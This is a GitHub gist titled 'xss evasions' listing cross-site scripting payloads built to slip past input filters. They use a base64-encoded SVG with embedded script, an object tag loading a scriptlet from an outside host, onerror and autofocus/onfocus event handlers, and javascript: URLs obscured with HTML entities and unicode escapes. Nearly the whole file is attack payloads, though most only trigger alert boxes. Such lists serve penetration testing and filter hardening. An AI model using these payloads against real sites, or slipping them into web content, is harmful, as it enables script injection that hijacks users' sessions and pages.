Skip to content

Instantly share code, notes, and snippets.

@synackme

synackme/xss.js

Last active September 11, 2018 04:46
Show Gist options
  • Save synackme/b3cc12c5f86d70ac56c495346f18fd4f to your computer and use it in GitHub Desktop.
Save synackme/b3cc12c5f86d70ac56c495346f18fd4f to your computer and use it in GitHub Desktop.
Download ZIP
xss evasions
Raw
xss.js
<embed src="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" allowscriptaccess="always"></embed>
<object data="https://xss.rocks/scriptlet.html" type="text/x-scriptlet"></object>
<Img src = x onerror = "javascript: window.onerror = alert; throw XSS">
<a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=j&#97v&#97script:&#97lert(1)>ClickMe
<form><a href="javascript:\u0061lert(1)">X
<iframe src=javascript&colon;alert&lpar;document&period;location&rpar;>
<iframe src="javascript:alert(document.location)"></iframe>
<select autofocus onfocus=alert(1)>
<input type="text" value="" autofocus onfocus=alert(1) a="">
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment